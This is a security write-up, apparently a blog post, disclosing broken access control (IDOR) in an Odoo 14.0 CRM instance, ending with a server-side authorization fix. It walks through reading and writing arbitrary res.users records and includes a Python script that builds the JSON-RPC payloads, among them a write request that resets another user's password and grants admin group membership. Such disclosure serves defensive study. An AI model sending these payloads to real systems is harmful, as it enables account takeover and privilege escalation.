Critical Broken Access Control Exploitation in Odoo 14.0

Ryan Runako
MII Cyber Security Consulting Services
4 min read · Jan 17, 2024

About a month ago, I discovered an intriguing broken access control vulnerability that could result in user or admin account takeover and privilege escalation in the Odoo app. Before I explain how I found the vulnerability, let me provide an overview of Odoo.

What is Odoo?

Odoo is an open-source business management software suite that includes a variety of applications and modules for different business needs. It is designed to help companies manage their various business processes, such as accounting, inventory management, customer relationship management (CRM), human resources, e-commerce, and more. Odoo provides a modular approach, allowing businesses to choose and integrate the specific modules that meet their requirements.

Briefly put, Odoo is an application framework for building web-based business software: business needs are met by installing the relevant modules and plugins as required, rather than coding each function from scratch for every kind of business management.

Vulnerability

The vulnerability I found, on a production hospitality-management website running Odoo CRM version 14.0, is an IDOR in the functionality for viewing and editing user objects from the user profile. I then found an endpoint that exposes every parameter and attribute of the user model, and finally the vulnerability allowed me to change any other user's password and privileges (user groups).

Odoo's JSON-RPC interface hands read and write calls straight to the ORM, where authorization comes down to the instance's model access rights and record rules for the target model (plus any checks the model's own methods add). On the tested instance a low-privilege session was allowed to write to res.users, and nothing tied the user ID named in the request to the user who owned the session: the client could point a request at any user record, change its attributes, and append extra field names to the request body, and the server accepted all of it.

POC (Proof Of Concept)

While logged in as a low-privilege user, I found a menu from which the user's profile attributes could be viewed and edited.

Vulnerable Entry Point Menu

When I captured the request behind the menu above in Burp Suite, it turned out to go to the res.users/read and res.users/write endpoints, used respectively to view user profile data and to change user attributes, as shown in the image below.

Default requests for viewing and editing the user's data

After some further enumeration, I discovered the load_views method. I then called it on the res.users model and, as expected, the request returned all details about the parameters and attributes of the res.users model.

res.users/load_views request

To make the response easier to read I used a JSON viewer; approximately 800 attributes were available, any of which could be manipulated on each user record.

res.users/load_views response in a JSON viewer

Back on the res.users/read endpoint, as shown in the picture below, I attempted to retrieve the user's ID, name, password, login name and group_id. The server responded successfully with the current login name and group_id. As for the password, I am not entirely sure why the returned value is blank, possibly due to the encryption mechanism. Nevertheless, it confirms that the parameter is valid for the res.users model.

Retrieving other attributes of the user

For the exploitation, I changed the password of another user (or my own) by adding a "password" parameter with a value of my choice to the write request. Having collected the user model attributes in the steps above, I then assigned the administrator role to the user by including "in_group_[group_id]": true in the same request, achieving privilege escalation to the admin role. The POC can be seen in the exploit figure below.

User role and password exploit POC
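As an added example (my own code, not the author's and not part of the original post), the script below reconstructs the three JSON-RPC requests behind the Burp screenshots above (res.users load_views, read and write) and adds a non-destructive check that asks the ORM itself, via check_access_rights and check_access_rule, whether the current session may write another user's record. It assumes the target exposes Odoo's standard /web/dataset/call_kw/<model>/<method> endpoint and that the tester already holds a session cookie for a low-privilege user; the user id 2 and the group id in the demo are placeholders, and the two server replies are constructed, not captured from any real system. One caveat on the read step: the blank password in the response is expected behaviour, because the password field of res.users is a computed field that yields an empty string (only its inverse, which hashes a newly written value, does any work), so the read confirms the field name exists but never leaks the stored hash.

```python
"""Added example (not from the original post): JSON-RPC payload builders for the
three res.users calls in the POC (load_views, read, write) plus a classifier
that tells an authorization denial from an accepted call.

Assumptions the post does not state: the target exposes Odoo's standard
/web/dataset/call_kw/<model>/<method> endpoint, the tester already holds a
session cookie for a low-privilege user, and the ids used in demo() are
placeholders.
"""
from typing import Any, Callable, Dict, List, Optional

JsonDict = Dict[str, Any]
Transport = Callable[[str, JsonDict], JsonDict]  # (path, payload) -> decoded reply


def call_kw_payload(model: str, method: str, args: List[Any],
                    kwargs: Optional[JsonDict] = None, req_id: int = 1) -> JsonDict:
    """Wrap an ORM call in the envelope Odoo's web client posts to call_kw."""
    kw = dict(kwargs or {})
    kw.setdefault("context", {})
    return {"jsonrpc": "2.0", "method": "call", "id": req_id,
            "params": {"model": model, "method": method, "args": args, "kwargs": kw}}


def call_kw_path(model: str, method: str) -> str:
    return f"/web/dataset/call_kw/{model}/{method}"


# Step 1 of the POC: enumerate every field of res.users from its form view.
def load_views_payload() -> JsonDict:
    return call_kw_payload("res.users", "load_views", [],
                           {"views": [[False, "form"]], "options": {}})


# Step 2: read selected fields of an arbitrary user id (the IDOR itself).
def read_payload(user_id: int) -> JsonDict:
    return call_kw_payload("res.users", "read",
                           [[user_id], ["id", "name", "login", "password", "groups_id"]])


# Step 3: the post's write request: a new password plus the reified
# in_group_<id> flag that adds the record to a group. Destructive if accepted.
def write_payload(user_id: int, new_password: str, group_id: int) -> JsonDict:
    return call_kw_payload("res.users", "write",
                           [[user_id], {"password": new_password,
                                        f"in_group_{group_id}": True}])


def classify(reply: JsonDict) -> str:
    """'denied' if the ORM raised AccessError, 'accepted' if a result came back,
    'error' for any other server-side failure (unknown method, bad field, ...)."""
    err = reply.get("error")
    if err is None:
        return "accepted" if "result" in reply else "error"
    name = (err.get("data") or {}).get("name", "")
    return "denied" if name.endswith("AccessError") else "error"


def probe_write_on_other_user(send: Transport, victim_id: int) -> str:
    """Non-destructive stand-in for step 3: ask the ORM's own access checks
    (model-level ACL first, then record rules) whether this session may write
    the victim's record. 'accepted' from both means a real write would go through."""
    acl = classify(send(call_kw_path("res.users", "check_access_rights"),
                        call_kw_payload("res.users", "check_access_rights", ["write"])))
    if acl != "accepted":
        return acl
    return classify(send(call_kw_path("res.users", "check_access_rule"),
                         call_kw_payload("res.users", "check_access_rule",
                                         [[victim_id], "write"])))


# Constructed replies in the shape Odoo's JSON-RPC layer returns (not captured
# from any real system).
DENIED_REPLY: JsonDict = {
    "jsonrpc": "2.0", "id": 1,
    "error": {"code": 200, "message": "Odoo Server Error",
              "data": {"name": "odoo.exceptions.AccessError",
                       "message": "You are not allowed to modify 'Users' (res.users) records."}}}
ACCEPTED_REPLY: JsonDict = {"jsonrpc": "2.0", "id": 1, "result": True}


def demo() -> Dict[str, str]:
    """Run the probe against three fake transports: a hardened instance that
    denies at the ACL, one that only denies via a record rule, and one
    configured like the post's target, which accepts everything."""
    hardened: Transport = lambda path, payload: DENIED_REPLY
    rule_only: Transport = lambda path, payload: (
        DENIED_REPLY if path.endswith("check_access_rule") else ACCEPTED_REPLY)
    exposed: Transport = lambda path, payload: ACCEPTED_REPLY
    return {"hardened": probe_write_on_other_user(hardened, victim_id=2),
            "rule_only": probe_write_on_other_user(rule_only, victim_id=2),
            "exposed": probe_write_on_other_user(exposed, victim_id=2)}


if __name__ == "__main__":
    print(demo())  # {'hardened': 'denied', 'rule_only': 'denied', 'exposed': 'accepted'}
```

Only the probe is safe to run repeatedly; sending write_payload against a vulnerable instance actually resets the password, so use it only on systems you are authorized to test. The probe doubles as a regression check after hardening: for every non-administrator session it should return "denied".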

Conclusion

With this type of vulnerability, an attacker can modify almost any data on the server without authorization. Within my testing scope I focused on the user model, where I could gather all user information, take over accounts by changing other users' passwords, and gain admin privileges by adding administrative groups. The impact includes data theft, account manipulation, and even functional failure of the application and server. All-in-one frameworks such as Odoo therefore still need attention from a security standpoint. In the case described here, the fix is to enforce object-level authorization on the server for every RPC endpoint: the rights of the user who owns the session, not any identifier supplied in the request body, must decide which res.users records and which fields that session may read or write, so that a non-administrator can edit only its own self-service fields and can never set the password or group membership of another account.

Reference

Open Source ERP and CRM | Odoo

API1:2023 Broken Object Level Authorization — OWASP API Security Top 10
